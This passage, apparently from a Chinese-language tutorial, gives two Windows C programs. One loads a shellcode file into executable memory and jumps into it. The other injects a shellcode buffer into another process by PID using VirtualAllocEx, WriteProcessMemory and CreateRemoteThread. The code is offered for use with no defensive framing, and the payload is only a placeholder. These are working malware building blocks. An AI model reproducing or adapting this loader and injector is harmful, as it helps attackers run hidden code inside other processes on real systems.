1 通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.
 2 
 3 #include <stdio.h>
 4 #include <Windows.h>
 5 
 6 int main(int argc, char * argv[])
 7 {
 8     HANDLE fp;
 9     unsigned char * fBuffer;
10     DWORD fSize, dwSize;
11 
12     fp = CreateFile(L"c://shellcode.bin", GENERIC_READ, FILE_SHARE_READ, NULL,
13         OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
14 
15     fSize = GetFileSize(fp, 0);
16     fBuffer = (unsigned char *)VirtualAlloc(NULL, fSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
17     ReadFile(fp, fBuffer, fSize, &dwSize, 0);
18     CloseHandle(fp);
19 
20     __asm
21     {
22         mov eax,fBuffer
23         push eax
24         ret
25         int 3
26     }
27     return 0;
28 }
29 ShellCode注入进程:
30 
31 #include <stdio.h>
32 #include <windows.h>
33 
34 unsigned char ShellCode[] = "shellcode代码";
35 
36 BOOL InjectShellCode(int Pid)
37 {
38     HANDLE Handle, remoteThread;
39     PVOID remoteBuffer;
40 
41     Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
42 
43     remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
44     WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
45     remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
46     CloseHandle(Handle);
47 }
48 
49 
50 int main(int argc, char *argv[])
51 {
52     InjectShellCode(1024);
53     return 0;
54 }